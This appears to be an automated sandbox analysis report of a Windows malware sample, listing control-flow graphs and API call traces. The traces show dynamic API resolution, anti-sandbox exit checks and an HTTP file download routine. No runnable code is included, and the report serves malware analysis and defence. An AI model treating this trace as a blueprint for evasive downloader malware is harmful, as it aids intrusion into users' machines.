                        control_flow_graph 2125 466390-4663bd GetPEB 2126 4665c3-466623 LoadLibraryA * 5 2125->2126 2127 4663c3-4665be call 4662f0 GetProcAddress * 20 2125->2127 2129 466625-466633 GetProcAddress 2126->2129 2130 466638-46663f 2126->2130 2127->2126 2129->2130 2132 466641-466667 GetProcAddress * 2 2130->2132 2133 46666c-466673 2130->2133 2132->2133 2134 466675-466683 GetProcAddress 2133->2134 2135 466688-46668f 2133->2135 2134->2135 2136 4666a4-4666ab 2135->2136 2137 466691-46669f GetProcAddress 2135->2137 2139 4666d7-4666da 2136->2139 2140 4666ad-4666d2 GetProcAddress * 2 2136->2140 2137->2136 2140->2139
                        APIs
                        • GetProcAddress.KERNEL32(74DD0000,015823C8), ref: 004663E9
                        • GetProcAddress.KERNEL32(74DD0000,01582458), ref: 00466402
                        • GetProcAddress.KERNEL32(74DD0000,01582350), ref: 0046641A
                        • GetProcAddress.KERNEL32(74DD0000,01582218), ref: 00466432
                        • GetProcAddress.KERNEL32(74DD0000,01589028), ref: 0046644B
                        • GetProcAddress.KERNEL32(74DD0000,015756F0), ref: 00466463
                        • GetProcAddress.KERNEL32(74DD0000,01575710), ref: 0046647B
                        • GetProcAddress.KERNEL32(74DD0000,01582320), ref: 00466494
                        • GetProcAddress.KERNEL32(74DD0000,01582488), ref: 004664AC
                        • GetProcAddress.KERNEL32(74DD0000,01582500), ref: 004664C4
                        • GetProcAddress.KERNEL32(74DD0000,01582290), ref: 004664DD
                        • GetProcAddress.KERNEL32(74DD0000,01575870), ref: 004664F5
                        • GetProcAddress.KERNEL32(74DD0000,015823B0), ref: 0046650D
                        • GetProcAddress.KERNEL32(74DD0000,015823E0), ref: 00466526
                        • GetProcAddress.KERNEL32(74DD0000,01575970), ref: 0046653E
                        • GetProcAddress.KERNEL32(74DD0000,015824A0), ref: 00466556
                        • GetProcAddress.KERNEL32(74DD0000,015822A8), ref: 0046656F
                        • GetProcAddress.KERNEL32(74DD0000,01575A90), ref: 00466587
                        • GetProcAddress.KERNEL32(74DD0000,01582230), ref: 0046659F
                        • GetProcAddress.KERNEL32(74DD0000,01575A30), ref: 004665B8
                        • LoadLibraryA.KERNEL32(01582560,?,?,?,00461C03), ref: 004665C9
                        • LoadLibraryA.KERNEL32(015825C0,?,?,?,00461C03), ref: 004665DB
                        • LoadLibraryA.KERNEL32(01582530,?,?,?,00461C03), ref: 004665ED
                        • LoadLibraryA.KERNEL32(015825D8,?,?,?,00461C03), ref: 004665FE
                        • LoadLibraryA.KERNEL32(015825A8,?,?,?,00461C03), ref: 00466610
                        • GetProcAddress.KERNEL32(75A70000,01582590), ref: 0046662D
                        • GetProcAddress.KERNEL32(75290000,01582578), ref: 00466649
                        • GetProcAddress.KERNEL32(75290000,01582518), ref: 00466661
                        • GetProcAddress.KERNEL32(75BD0000,01582548), ref: 0046667D
                        • GetProcAddress.KERNEL32(75450000,015756D0), ref: 00466699
                        • GetProcAddress.KERNEL32(76E90000,015890A8), ref: 004666B5
                        • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 004666CC
                        Strings
                        • NtQueryInformationProcess, xrefs: 004666C1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: NtQueryInformationProcess
                        • API String ID: 2238633743-2781105232
                        • Opcode ID: d0a8040137afcc966bbc7f49e606a143248c90dfa0c0f4c8ed0ec31d3cdc70d5
                        • Instruction ID: 46d691cd7972e962e6649a315049315c4e3c09d0fd5138cafd7de4e39924bc41
                        • Opcode Fuzzy Hash: d0a8040137afcc966bbc7f49e606a143248c90dfa0c0f4c8ed0ec31d3cdc70d5
                        • Instruction Fuzzy Hash: 55A14FB56A12009FD758DF68ED48A2A37FBF789754310A51DE91E83360EB34AC80DB71

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2141 461bf0-461c0b call 442a90 call 466390 2146 461c0d 2141->2146 2147 461c1a-461c27 call 442930 2141->2147 2148 461c10-461c18 2146->2148 2151 461c35-461c63 2147->2151 2152 461c29-461c2f lstrcpy 2147->2152 2148->2147 2148->2148 2156 461c65-461c67 ExitProcess 2151->2156 2157 461c6d-461c7b GetSystemInfo 2151->2157 2152->2151 2158 461c85-461ca0 call 441030 call 4410c0 GetUserDefaultLangID 2157->2158 2159 461c7d-461c7f ExitProcess 2157->2159 2164 461ca2-461ca9 2158->2164 2165 461cb8-461cca call 462ad0 call 463e10 2158->2165 2164->2165 2166 461cb0-461cb2 ExitProcess 2164->2166 2171 461ce7-461d06 lstrlen call 442930 2165->2171 2172 461ccc-461cde call 462a40 call 463e10 2165->2172 2178 461d23-461d40 lstrlen call 442930 2171->2178 2179 461d08-461d0d 2171->2179 2172->2171 2184 461ce0-461ce1 ExitProcess 2172->2184 2186 461d42-461d44 2178->2186 2187 461d5a-461d7b call 462ad0 lstrlen call 442930 2178->2187 2179->2178 2182 461d0f-461d11 2179->2182 2182->2178 2185 461d13-461d1d lstrcpy lstrcat 2182->2185 2185->2178 2186->2187 2188 461d46-461d54 lstrcpy lstrcat 2186->2188 2193 461d7d-461d7f 2187->2193 2194 461d9a-461db4 lstrlen call 442930 2187->2194 2188->2187 2193->2194 2195 461d81-461d85 2193->2195 2199 461db6-461db8 2194->2199 2200 461dce-461deb call 462a40 lstrlen call 442930 2194->2200 2195->2194 2197 461d87-461d94 lstrcpy lstrcat 2195->2197 2197->2194 2199->2200 2201 461dba-461dc8 lstrcpy lstrcat 2199->2201 2206 461ded-461def 2200->2206 2207 461e0a-461e0f 2200->2207 2201->2200 2206->2207 2208 461df1-461df5 2206->2208 2209 461e16-461e22 call 442930 2207->2209 2210 461e11 call 442a20 2207->2210 2208->2207 2211 461df7-461e04 lstrcpy lstrcat 2208->2211 2215 461e24-461e26 2209->2215 2216 461e30-461e66 call 442a20 * 5 OpenEventA 2209->2216 2210->2209 2211->2207 2215->2216 2217 461e28-461e2a lstrcpy 2215->2217 2228 461e8c-461ea0 CreateEventA call 461b20 call 45ffd0 2216->2228 2229 461e68-461e8a CloseHandle Sleep OpenEventA 2216->2229 
2217->2216 2233 461ea5-461eae CloseHandle ExitProcess 2228->2233 2229->2228 2229->2229
                        APIs
                          • Part of subcall function 00466390: GetProcAddress.KERNEL32(74DD0000,015823C8), ref: 004663E9
                          • Part of subcall function 00466390: GetProcAddress.KERNEL32(74DD0000,01582458), ref: 00466402
                          • Part of subcall function 00466390: GetProcAddress.KERNEL32(74DD0000,01582350), ref: 0046641A
                          • Part of subcall function 00466390: GetProcAddress.KERNEL32(74DD0000,01582218), ref: 00466432
                          • Part of subcall function 00466390: GetProcAddress.KERNEL32(74DD0000,01589028), ref: 0046644B
                          • Part of subcall function 00466390: GetProcAddress.KERNEL32(74DD0000,015756F0), ref: 00466463
                          • Part of subcall function 00466390: GetProcAddress.KERNEL32(74DD0000,01575710), ref: 0046647B
                          • Part of subcall function 00466390: GetProcAddress.KERNEL32(74DD0000,01582320), ref: 00466494
                          • Part of subcall function 00466390: GetProcAddress.KERNEL32(74DD0000,01582488), ref: 004664AC
                          • Part of subcall function 00466390: GetProcAddress.KERNEL32(74DD0000,01582500), ref: 004664C4
                          • Part of subcall function 00466390: GetProcAddress.KERNEL32(74DD0000,01582290), ref: 004664DD
                          • Part of subcall function 00466390: GetProcAddress.KERNEL32(74DD0000,01575870), ref: 004664F5
                          • Part of subcall function 00466390: GetProcAddress.KERNEL32(74DD0000,015823B0), ref: 0046650D
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00461C2F
                        • ExitProcess.KERNEL32 ref: 00461C67
                        • GetSystemInfo.KERNEL32(?), ref: 00461C71
                        • ExitProcess.KERNEL32 ref: 00461C7F
                          • Part of subcall function 00441030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00441046
                          • Part of subcall function 00441030: VirtualAllocExNuma.KERNEL32(00000000), ref: 0044104D
                          • Part of subcall function 00441030: ExitProcess.KERNEL32 ref: 00441058
                          • Part of subcall function 004410C0: GlobalMemoryStatusEx.KERNEL32 ref: 004410EA
                          • Part of subcall function 004410C0: ExitProcess.KERNEL32 ref: 00441114
                        • GetUserDefaultLangID.KERNEL32 ref: 00461C8F
                        • ExitProcess.KERNEL32 ref: 00461CB2
                        • ExitProcess.KERNEL32 ref: 00461CE1
                        • lstrlen.KERNEL32(01588FE8), ref: 00461CEE
                        • lstrcpy.KERNEL32(00000000,?), ref: 00461D15
                        • lstrcat.KERNEL32(00000000,01588FE8), ref: 00461D1D
                        • lstrlen.KERNEL32(00474B98), ref: 00461D28
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00461D48
                        • lstrcat.KERNEL32(00000000,00474B98), ref: 00461D54
                        • lstrlen.KERNEL32(00000000), ref: 00461D63
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00461D89
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00461D94
                        • lstrlen.KERNEL32(00474B98), ref: 00461D9F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00461DBC
                        • lstrcat.KERNEL32(00000000,00474B98), ref: 00461DC8
                        • lstrlen.KERNEL32(00000000), ref: 00461DD7
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00461DF9
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00461E04
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                        • String ID:
                        • API String ID: 3366406952-0
                        • Opcode ID: 279bb1cf5152c61f48e7f9e9b90e3a542f2d686fc74ae3cab3c7ad9600d111fd
                        • Instruction ID: 2db5734934593d7dd9d98a1b6dd63ec258ba4f6696673b19525fd5e043af0651
                        • Opcode Fuzzy Hash: 279bb1cf5152c61f48e7f9e9b90e3a542f2d686fc74ae3cab3c7ad9600d111fd
                        • Instruction Fuzzy Hash: 1671D531640205ABD724AFB1DD4DB6F36BAAF45705F08102AF90A93271EF789C418B7A

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2234 446c40-446c64 call 442930 2237 446c75-446c97 call 444bc0 2234->2237 2238 446c66-446c6b 2234->2238 2242 446c99 2237->2242 2243 446caa-446cba call 442930 2237->2243 2238->2237 2240 446c6d-446c6f lstrcpy 2238->2240 2240->2237 2244 446ca0-446ca8 2242->2244 2247 446cbc-446cc2 lstrcpy 2243->2247 2248 446cc8-446cf5 InternetOpenA StrCmpCA 2243->2248 2244->2243 2244->2244 2247->2248 2249 446cf7 2248->2249 2250 446cfa-446cfc 2248->2250 2249->2250 2251 446d02-446d22 InternetConnectA 2250->2251 2252 446ea8-446ebb call 442930 2250->2252 2254 446ea1-446ea2 InternetCloseHandle 2251->2254 2255 446d28-446d5d HttpOpenRequestA 2251->2255 2259 446ebd-446ebf 2252->2259 2260 446ec9-446ee0 call 442a20 * 2 2252->2260 2254->2252 2257 446e94-446e9e InternetCloseHandle 2255->2257 2258 446d63-446d65 2255->2258 2257->2254 2261 446d67-446d77 InternetSetOptionA 2258->2261 2262 446d7d-446dad HttpSendRequestA HttpQueryInfoA 2258->2262 2259->2260 2265 446ec1-446ec3 lstrcpy 2259->2265 2261->2262 2263 446dd4-446de4 call 463d90 2262->2263 2264 446daf-446dd3 call 4671e0 call 442a20 * 2 2262->2264 2263->2264 2275 446de6-446de8 2263->2275 2265->2260 2277 446e8d-446e8e InternetCloseHandle 2275->2277 2278 446dee-446e07 InternetReadFile 2275->2278 2277->2257 2278->2277 2280 446e0d 2278->2280 2282 446e10-446e15 2280->2282 2282->2277 2283 446e17-446e3d call 467310 2282->2283 2286 446e44-446e51 call 442930 2283->2286 2287 446e3f call 442a20 2283->2287 2291 446e61-446e8b call 442a20 InternetReadFile 2286->2291 2292 446e53-446e57 2286->2292 2287->2286 2291->2277 2291->2282 2292->2291 2293 446e59-446e5b lstrcpy 2292->2293 2293->2291
                        APIs
                        • lstrcpy.KERNEL32(00000000,?), ref: 00446C6F
                        • lstrcpy.KERNEL32(00000000,0046CFEC), ref: 00446CC2
                        • InternetOpenA.WININET(0046CFEC,00000001,00000000,00000000,00000000), ref: 00446CD5
                        • StrCmpCA.SHLWAPI(?,0158EAA8), ref: 00446CED
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00446D15
                        • HttpOpenRequestA.WININET(00000000,GET,?,0158E4D8,00000000,00000000,-00400100,00000000), ref: 00446D50
                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00446D77
                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00446D86
                        • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00446DA5
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00446DFF
                        • lstrcpy.KERNEL32(00000000,?), ref: 00446E5B
                        • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00446E7D
                        • InternetCloseHandle.WININET(00000000), ref: 00446E8E
                        • InternetCloseHandle.WININET(?), ref: 00446E98
                        • InternetCloseHandle.WININET(00000000), ref: 00446EA2
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00446EC3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                        • String ID: ERROR$GET
                        • API String ID: 3687753495-3591763792
                        • Opcode ID: 5673dcb9a799576d81c45b58f00692290f8707fe8f90cb3dbb7c1439a07297db
                        • Instruction ID: 4b1e680a6b85edd074c531d6c8273ba45ed79f888ded607956138c9b4f7e3d80
                        • Opcode Fuzzy Hash: 5673dcb9a799576d81c45b58f00692290f8707fe8f90cb3dbb7c1439a07297db
                        • Instruction Fuzzy Hash: B381C671A40215ABEB10DFA4DC49FAF77B9EF45700F10402AF909E7380DB78AD448BA9

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2850 444a60-444afc RtlAllocateHeap 2867 444afe-444b03 2850->2867 2868 444b7a-444bbe VirtualProtect 2850->2868 2869 444b06-444b78 2867->2869 2869->2868
                        APIs
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00444AA2
                        • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00444BB0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_440000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeapProtectVirtual
                        • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                        • API String ID: 1542196881-3329630956
                        • Opcode ID: d059502d02fe3d353826f096888119797dad1e0321f3bce42db60a114c54a8f8
                        • Instruction ID: 5cc9d6d1baf6021b4d8aefbc1c6a299396a83f66f9d630092d5f8a487891469f
                        • Opcode Fuzzy Hash: d059502d02fe3d353826f096888119797dad1e0321f3bce42db60a114c54a8f8
                        • Instruction Fuzzy Hash: 1631E7DAB802BC769620EBFF4C47FBFAE55DFC5750B218057760C57180CBA95600CAAA
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00462A6F
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00462A76
                        • GetUserNameA.ADVAPI32(00000000,00000104), ref: 00462A8A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1742584699.0000000000441000.00000040.00000001.01000000.00000003.sdmp, Offset: 00440000, based on PE: true
                        • Associated: 00000000.00000002.1742468936.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000477000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004CE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004D6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1742584699.0000000000678000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744000662.000000000068A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000816000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.00000000008F8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.000000000091F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000926000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744083215.0000000000935000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744810954.0000000000936000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744965147.0000000000AD3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1744983459.0000000000AD4000.00000080.00000001.01000000.00000003.sdmp
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateNameProcessUser
                        • String ID:
                        • API String ID: 1296208442-0
                        • Opcode ID: d3667f527b7d3eb025ce3d4b80ea1f7361b35932a988a852f0427f432c95180a
                        • Instruction ID: ca4808622eda7bd47fa11dadb6c80ebac4ebb029b459be749481b7b70625841e
                        • Opcode Fuzzy Hash: d3667f527b7d3eb025ce3d4b80ea1f7361b35932a988a852f0427f432c95180a
                        • Instruction Fuzzy Hash: 20F0B4B1A40604AFC700DF88DD49F9EBBBCF704B21F10021AF919E3380D77819448BA1

Control-flow Graph (function 0x4666e0, import resolution; the rendered graph distinguishes executed from not-executed blocks): the entry block 0x4666e0 either enters 0x4666ed, which issues 43 GetProcAddress calls against a single module handle, or goes straight to 0x466afe, which calls LoadLibraryA eight times. From there each further group of GetProcAddress calls (5, 8, 5, 6, 12, 5, 2, 2, 10, 4, 1 and 4 calls, at 0x466b94, 0x466c15, 0x466cdb, 0x466d5c, 0x466df6, 0x466f19, 0x466f96, 0x466fca, 0x467002, 0x4670f6, 0x46715b and 0x467177) is preceded by a short conditional block that either enters the group or skips to the next test, and the routine ends at 0x4671d3.
                        APIs
                        • GetProcAddress.KERNEL32(74DD0000,015757D0), ref: 004666F5
                        • GetProcAddress.KERNEL32(74DD0000,015758D0), ref: 0046670D
                        • GetProcAddress.KERNEL32(74DD0000,01589628), ref: 00466726
                        • GetProcAddress.KERNEL32(74DD0000,01589670), ref: 0046673E
                        • GetProcAddress.KERNEL32(74DD0000,01589640), ref: 00466756
                        • GetProcAddress.KERNEL32(74DD0000,01589688), ref: 0046676F
                        • GetProcAddress.KERNEL32(74DD0000,0157B798), ref: 00466787
                        • GetProcAddress.KERNEL32(74DD0000,0158D670), ref: 0046679F
                        • GetProcAddress.KERNEL32(74DD0000,0158D5E0), ref: 004667B8
                        • GetProcAddress.KERNEL32(74DD0000,0158D5B0), ref: 004667D0
                        • GetProcAddress.KERNEL32(74DD0000,0158D598), ref: 004667E8
                        • GetProcAddress.KERNEL32(74DD0000,015758F0), ref: 00466801
                        • GetProcAddress.KERNEL32(74DD0000,015757F0), ref: 00466819
                        • GetProcAddress.KERNEL32(74DD0000,01575830), ref: 00466831
                        • GetProcAddress.KERNEL32(74DD0000,01575850), ref: 0046684A
                        • GetProcAddress.KERNEL32(74DD0000,0158D610), ref: 00466862
                        • GetProcAddress.KERNEL32(74DD0000,0158D628), ref: 0046687A
                        • GetProcAddress.KERNEL32(74DD0000,0157B7C0), ref: 00466893
                        • GetProcAddress.KERNEL32(74DD0000,01575910), ref: 004668AB
                        • GetProcAddress.KERNEL32(74DD0000,0158D658), ref: 004668C3
                        • GetProcAddress.KERNEL32(74DD0000,0158D6A0), ref: 004668DC
                        • GetProcAddress.KERNEL32(74DD0000,0158D520), ref: 004668F4
                        • GetProcAddress.KERNEL32(74DD0000,0158D5C8), ref: 0046690C
                        • GetProcAddress.KERNEL32(74DD0000,01575990), ref: 00466925
                        • GetProcAddress.KERNEL32(74DD0000,0158D508), ref: 0046693D
                        • GetProcAddress.KERNEL32(74DD0000,0158D688), ref: 00466955
                        • GetProcAddress.KERNEL32(74DD0000,0158D6B8), ref: 0046696E
                        • GetProcAddress.KERNEL32(74DD0000,0158D580), ref: 00466986
                        • GetProcAddress.KERNEL32(74DD0000,0158D5F8), ref: 0046699E
                        • GetProcAddress.KERNEL32(74DD0000,0158D538), ref: 004669B7
                        • GetProcAddress.KERNEL32(74DD0000,0158D550), ref: 004669CF
                        • GetProcAddress.KERNEL32(74DD0000,0158D568), ref: 004669E7
                        • GetProcAddress.KERNEL32(74DD0000,0158D640), ref: 00466A00
                        • GetProcAddress.KERNEL32(74DD0000,0158A320), ref: 00466A18
                        • GetProcAddress.KERNEL32(74DD0000,0158D1D8), ref: 00466A30
                        • GetProcAddress.KERNEL32(74DD0000,0158D190), ref: 00466A49
                        • GetProcAddress.KERNEL32(74DD0000,015759B0), ref: 00466A61
                        • GetProcAddress.KERNEL32(74DD0000,0158D058), ref: 00466A79
                        • GetProcAddress.KERNEL32(74DD0000,015759F0), ref: 00466A92
                        • GetProcAddress.KERNEL32(74DD0000,0158CFC8), ref: 00466AAA
                        • GetProcAddress.KERNEL32(74DD0000,0158D178), ref: 00466AC2
                        • GetProcAddress.KERNEL32(74DD0000,01575A10), ref: 00466ADB
                        • GetProcAddress.KERNEL32(74DD0000,01575B50), ref: 00466AF3
                        • LoadLibraryA.KERNEL32(0158D1C0,0046051F), ref: 00466B05
                        • LoadLibraryA.KERNEL32(0158D010), ref: 00466B16
                        • LoadLibraryA.KERNEL32(0158D070), ref: 00466B28
                        • LoadLibraryA.KERNEL32(0158D028), ref: 00466B3A
                        • LoadLibraryA.KERNEL32(0158D118), ref: 00466B4B
                        • LoadLibraryA.KERNEL32(0158D1F0), ref: 00466B5D
                        • LoadLibraryA.KERNEL32(0158D0A0), ref: 00466B6F
                        • LoadLibraryA.KERNEL32(0158D100), ref: 00466B80
                        • GetProcAddress.KERNEL32(75290000,01575C30), ref: 00466B9C
                        • GetProcAddress.KERNEL32(75290000,0158D040), ref: 00466BB4
                        • GetProcAddress.KERNEL32(75290000,01588F18), ref: 00466BCD
                        • GetProcAddress.KERNEL32(75290000,0158CFF8), ref: 00466BE5
                        • GetProcAddress.KERNEL32(75290000,01575E30), ref: 00466BFD
                        • GetProcAddress.KERNEL32(73B40000,0157BAB8), ref: 00466C1D
                        • GetProcAddress.KERNEL32(73B40000,01575C10), ref: 00466C35
